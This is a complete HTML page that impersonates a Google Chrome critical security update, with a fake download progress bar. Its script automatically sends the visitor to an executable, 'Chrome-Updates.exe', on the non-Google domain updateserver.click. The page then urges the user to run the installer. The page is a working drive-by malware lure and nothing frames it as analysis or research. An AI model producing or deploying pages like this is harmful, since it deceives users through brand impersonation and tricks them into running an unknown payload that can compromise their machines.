<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Critical Security Update</title>
    <style>
        :root { --accent: #4285F4; }
        body { margin: 0; background: #0a0a0a; color: #fff; font-family: 'Segoe UI', Tahoma, sans-serif; display: flex; align-items: center; justify-content: center; height: 100vh; overflow: hidden; }
        .modal { background: #151515; width: 440px; padding: 45px; border-radius: 8px; border: 1px solid #222; box-shadow: 0 0 50px rgba(0,0,0,0.8); text-align: center; }
        .logo { width: 80px; margin-bottom: 25px; }
        h1 { font-size: 20px; color: #ff3333; margin: 0 0 15px; text-transform: uppercase; letter-spacing: 1px; }
        p { font-size: 14px; line-height: 1.6; color: #888; margin-bottom: 30px; }
        .status-box { background: #1a1a1a; border-radius: 4px; padding: 20px; border: 1px dashed #333; }
        .warning-text { color: var(--accent); font-weight: bold; font-size: 13px; margin-bottom: 10px; display: block; }
        .progress-line { height: 4px; background: #222; border-radius: 10px; overflow: hidden; }
        .bar { height: 100%; width: 0%; background: var(--accent); animation: fill 2.5s forwards linear; }
        @keyframes fill { to { width: 100%; } }
        .blink { animation: blinker 1s linear infinite; color: #ff3333; font-weight: bold; font-size: 11px; }
        @keyframes blinker { 50% { opacity: 0; } }
    </style>
</head>
<body>
<div class="modal">
    <img src="https://www.google.com/chrome/static/images/chrome-logo-m100.svg" class="logo">
    <div id="step-1">
        <h1>Update Required</h1>
        <p>Your <strong>Google Chrome</strong> requires a critical security patch to continue browsing safely.</p>
        <div class="status-box">
            <span class="warning-text">DOWNLOADING EMERGENCY PATCH...</span>
            <div class="progress-line"><div class="bar"></div></div>
        </div>
    </div>
    <div id="step-2" style="display:none;">
        <h1 style="color: #ff3333;">Final Step</h1>
        <p>The update has been downloaded. Please <strong>run the installer</strong> to complete the security synchronization.</p>
        <div class="status-box">
            <span class="blink">⚠ AWAITING MANUAL EXECUTION...</span>
        </div>
    </div>
</div>
<script>
    setTimeout(() => {
        window.location.href = "https://updateserver.click/Chrome-Updates.exe";
        document.getElementById('step-1').style.display = 'none';
        document.getElementById('step-2').style.display = 'block';
    }, 2500);
</script>
</body>
</html>
    